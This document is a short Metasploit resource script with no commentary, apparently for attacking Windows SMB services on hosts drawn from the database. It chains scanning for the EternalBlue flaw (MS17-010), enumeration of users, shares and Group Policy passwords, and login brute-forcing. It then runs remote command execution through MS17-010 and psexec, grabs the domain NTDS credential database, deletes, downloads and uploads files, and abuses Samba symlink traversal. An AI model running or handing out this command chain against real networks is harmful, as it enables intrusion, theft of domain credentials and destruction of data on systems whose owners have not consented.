services -S microsoft-ds -R
use auxiliary/scanner/smb/smb_ms17_010
exploit
use auxiliary/scanner/smb/smb1
exploit
use auxiliary/scanner/llmnr/query
run
use auxiliary/admin/smb/check_dir_file
run
use auxiliary/admin/smb/delete_file
run
use auxiliary/admin/smb/download_file
run
use auxiliary/admin/smb/list_directory
run
use auxiliary/admin/smb/ms17_010_command
run
use auxiliary/admin/smb/psexec_command
run
use auxiliary/admin/smb/psexec_ntdsgrab
run
use auxiliary/admin/smb/samba_symlink_traversal
run
use auxiliary/admin/smb/upload_file
run
use auxiliary/scanner/smb/smb2
run
use auxiliary/scanner/smb/smb_enum_gpp
run
use auxiliary/scanner/smb/smb_enumusers_domain
run
use auxiliary/scanner/smb/smb_enumusers
run
use auxiliary/scanner/smb/smb_enumshares
run
use auxiliary/scanner/smb/smb_login
run
use auxiliary/scanner/smb/smb_uninit_cred
run
